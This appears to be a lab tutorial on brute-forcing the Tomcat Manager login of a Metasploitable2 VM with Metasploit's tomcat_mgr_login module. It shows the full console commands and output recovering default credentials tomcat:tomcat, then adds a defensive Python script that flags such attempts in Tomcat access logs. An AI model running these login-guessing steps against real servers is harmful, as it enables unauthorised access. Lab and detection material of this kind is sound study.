Kali: attacking a Tomcat service

Tags: kali tomcat Metasploitable2

The attack target for this experiment is Metasploitable2-Linux.


1. Open the msfconsole console (the database errors printed below mean PostgreSQL is not running; the framework still works, but module search is slower and found credentials are not saved, as the later [!] lines show)

root@qzwhost:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
	Is the server running on host "localhost" (::1) and accepting
	TCP/IP connections on port 5432?
could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.30-dev                         ]
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

2. Search for usable Tomcat modules

msf > search tomcat
[!] Module database cache not built yet, using slow search


Matching Modules
================


   Name                                                         Disclosure Date  Rank       Description
   ----                                                         ---------------  ----       -----------
   auxiliary/admin/http/tomcat_administration                                    normal     Tomcat Administration Tool Default Access
   auxiliary/admin/http/tomcat_utf8_traversal                   2009-01-09       normal     Tomcat UTF-8 Directory Traversal Vulnerability
   auxiliary/admin/http/trendmicro_dlp_traversal                2009-01-09       normal     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   auxiliary/dos/http/apache_commons_fileupload_dos             2014-02-06       normal     Apache Commons FileUpload and Apache Tomcat DoS
   auxiliary/dos/http/apache_tomcat_transfer_encoding           2010-07-09       normal     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   auxiliary/dos/http/hashcollision_dos                         2011-12-28       normal     Hashtable Collisions
   auxiliary/scanner/http/tomcat_enum                                            normal     Apache Tomcat User Enumeration
   auxiliary/scanner/http/tomcat_mgr_login                                       normal     Tomcat Application Manager Login Utility
   exploit/multi/http/struts_code_exec_classloader              2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_dev_mode                           2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution
   exploit/multi/http/tomcat_jsp_upload_bypass                  2017-10-03       excellent  Tomcat RCE via JSP Upload Bypass
   exploit/multi/http/tomcat_mgr_deploy                         2009-11-09       excellent  Apache Tomcat Manager Application Deployer Authenticated Code Execution
   exploit/multi/http/tomcat_mgr_upload                         2009-11-09       excellent  Apache Tomcat Manager Authenticated Upload Code Execution
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Novell ZENworks Configuration Management Arbitrary File Upload
   post/multi/gather/tomcat_gather                                               normal     Gather Tomcat Credentials
   post/windows/gather/enum_tomcat                                               normal     Windows Gather Apache Tomcat Enumeration

Here we choose the module auxiliary/scanner/http/tomcat_mgr_login, which tries username/password pairs against the Tomcat Manager login.

3. View the options of the tomcat_mgr_login module

msf auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port (TCP)
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

4. Specify the username and password files; here the default wordlists are used

msf auxiliary(scanner/http/tomcat_mgr_login) > set user_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
user_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt
msf auxiliary(scanner/http/tomcat_mgr_login) > set pass_file /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
pass_file => /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

5. Specify the target server to attack

msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.52.132

6. Set the server port to 8180 (Metasploitable2 runs Tomcat on 8180 rather than the module's default of 8080)

msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180

7. Stop as soon as a login succeeds

msf auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
stop_on_success => true

8. Run the module

msf auxiliary(scanner/http/tomcat_mgr_login) > exploit

[!] No active DB -- Credential data will not be saved!
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.52.132:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.52.132:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The output shows that the credentials found are tomcat:tomcat.
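The output above is what the login guessing looks like from the attacker's side; on the server, the same run shows up in Tomcat's access log as a burst of 401 responses for /manager/html from one client, possibly followed by a 200 that carries an authenticated username. The following added example (not from the original post) parses constructed log lines in Tomcat's default "common" access-log format and flags that pattern; the client IPs, the threshold of five failures and the usernames are assumptions.

```python
import re
from collections import defaultdict

# Matches Tomcat's AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (not from the original post): 10.0.0.5 hammers the
# Manager app with wrong credentials and finally gets in; 10.0.0.9 logs in cleanly.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jan/2018:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jan/2018:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jan/2018:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jan/2018:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - - [20/Jan/2018:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.0.0.5 - tomcat [20/Jan/2018:10:00:03 +0000] "GET /manager/html HTTP/1.1" 200 13122
10.0.0.9 - admin [20/Jan/2018:10:05:00 +0000] "GET /manager/html HTTP/1.1" 200 13122
10.0.0.9 - - [20/Jan/2018:10:06:00 +0000] "GET /index.jsp HTTP/1.1" 200 1823
"""

def manager_login_report(log_text, threshold=5, path_prefix="/manager"):
    """Summarise Manager-app logins per client IP.
    Returns {ip: {"failures", "success_user", "alert"}}; an IP is flagged
    "bruteforce" once its 401 count reaches `threshold`, and
    "bruteforce_with_success" if it also completed an authenticated 200."""
    stats = defaultdict(lambda: {"failures": 0, "success_user": None, "alert": None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not m.group("path").startswith(path_prefix):
            continue  # unparseable, or not a request to the Manager app
        entry = stats[m.group("ip")]
        if m.group("status") == "401":
            entry["failures"] += 1          # rejected Basic-auth attempt
        elif m.group("status") == "200" and m.group("user") != "-":
            entry["success_user"] = m.group("user")  # %u is set only after auth
    for entry in stats.values():
        if entry["failures"] >= threshold:
            entry["alert"] = ("bruteforce_with_success" if entry["success_user"]
                              else "bruteforce")
    return dict(stats)

if __name__ == "__main__":
    for ip, entry in manager_login_report(SAMPLE_LOG).items():
        print(ip, entry)
```

The same report, run against a live access log, also shows which default accounts are still enabled: any 200 carrying a user such as tomcat that appears in the module's default wordlist is an account that should be removed or re-passworded in tomcat-users.xml.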

If this post helped you, please follow; thank you.
